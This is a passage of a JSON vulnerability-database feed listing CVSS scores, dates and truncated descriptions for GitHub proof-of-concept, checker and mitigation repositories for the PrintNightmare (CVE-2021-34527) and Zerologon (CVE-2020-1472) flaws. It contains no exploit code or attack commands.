"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-05T17:50:56", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-03-18T12:17:32", "id": "BDFBDA81-0DEB-5523-B538-F23C3B524986", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T15:04:48", "description": "# Disable-Spooler-Service-PrintNightmare-CVE-2021-34527\nSimple ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-07T06:41:15", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-07T06:47:16", "id": "8542D571-7253-5609-BC52-CBCB5F40929A", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-20T20:54:50", "description": "# CVE-2021-34527 PrintNightmare PoC \ud83d\udc7e\n\n## \ud83d\udcdd Description\nThis sim...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-08-20T12:04:18", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2023-08-20T12:06:06", "id": "F796D11D-F85B-5218-BBFA-9BDBAE5B6A59", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T04:22:54", "description": "# Set-ZerologonMitigation\nProtect your domain controllers agains...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-30T16:10:26", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-10-13T15:41:20", "id": "7078ED42-959E-5242-BE9D-17F2F99C76A8", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:33:37", "description": "# CVE-2020-1472 - Zero-Logon POC\n\n![alt text](https://github.com...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T14:29:24", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-01-27T07:28:51", "id": "06BAC40D-74DF-5994-909F-3A87FC3B76C8", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T18:07:17", "description": "# ZeroLogon testing script\n\nA Python script that uses the Impack...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-28T06:53:41", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-28T06:53:54", "id": "F085F702-F1C3-5ACB-99BE-086DA182D98B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-14T13:34:35", "description": "# ZeroLogon testing script\n\nA Python script that uses the Impack...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-08T08:58:37", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-08-14T07:26:46", "id": "C7CE5D12-A4E5-5FF2-9F07-CD5E84B4C02F", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:33:36", "description": "<b>[CVE-2020-1472] Netlogon Remote Protocol Call (MS-NRPC) Privi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-16T09:22:30", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-10-24T06:02:52", "id": "2E71FF50-1B48-5A8E-9212-C4CF9399715C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:27:32", "description": "# cve-2020-1472\n\n@[toc](CATALOG)\n# \u6f0f\u6d1e\u539f\u7406\n\u539f\u7406\u6bd4\u8f83\u590d\u6742\uff0c\u6709\u5174\u8da3\u7684\u53ef\u4ee5\u770b\u770b\u4e0b\u9762\u94fe\u63a5\u4e0a\u7684\u6587\u7ae0h...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-10T09:00:41", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-10-18T05:46:12", "id": "0CFAB531-412C-57A0-BD9E-EF072620C078", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:33:32", "description": "# ZeroLogon testing script\r\n\r\nA Python script that uses the Impa...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-16T14:25:54", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-19T17:56:06", "id": "63C36F7A-5F99-5A79-B99F-260360AC237F", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:17:29", "description": "# zabbix-template-CVE-2020-1472\nZabbix Template to monitor...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-16T02:37:52", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-02-08T22:22:05", "id": "12E44744-1AF0-523A-ACA2-593B4D33E014", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:34:15", "description": "# CVE-2020-1472 POC\nRequires the latest impacket from [GitHub](h...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-16T09:54:09", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-10-10T11:45:35", "id": "D178DAA4-01D0-50D0-A741-1C3C76A7D023", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:16:49", "description": "# CVE-2020-1472 POC\nRequires the latest impacket from [GitHub](h...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-16T03:54:27", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-19T17:56:42", "id": "FC661572-B96B-5B2C-B12F-E8D279E189BF", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T04:23:01", "description": "# CVE-2020-1472\nCVE 2020-1472 Script de validaci\u00f3n \n\nAssumption:...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-24T20:05:21", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-24T20:08:43", "id": "879CF3A7-ECBC-552A-A044-5E2724F63279", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:46:09", "description": "NOTICE: I have yet to build out this repo and it's respective sc...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-11-10T22:29:56", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-12-04T21:08:46", "id": "939F3BE7-AF69-5351-BD56-12412FA184C5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T04:23:28", "description": "# ZeroLogon testing script\n\nA Python script that uses the Impack...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-30T07:45:50", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-30T07:57:36", "id": "28D42B84-AB24-5FC6-ADE1-610374D67F21", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T04:23:02", "description": "# Windows NetLogon \u6743\u9650\u63d0\u5347\u6f0f\u6d1e\u590d\u73b0\uff08CVE-2020-1472\uff09\n\n\u9700\u5c06impacket.z...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-26T08:31:47", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-09-01T09:13:51", "id": "042AB58A-C86A-5A8B-AED3-2FF3624E97E3", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:32:45", "description": "# CVE-2020-1472-Easy\nThis is definitely not something you would ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-19T20:44:40", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-19T21:27:41", "id": "AEF449B8-DC3E-544A-A748-5A1C6F7EBA59", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-09T02:15:27", "description": "# CVE-2020-1472\nChecker & Exploit Code for CVE-2020-1472 aka **Z...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-14T16:57:49", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-08-08T04:14:32", "id": "BA280EB1-2FF9-52DA-8BA4-A276A1158DD8", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-15T21:36:46", "description": "# Zerologon (CVE-2020-1472)\nThis script is made for bulk checkin...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-29T18:45:44", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": 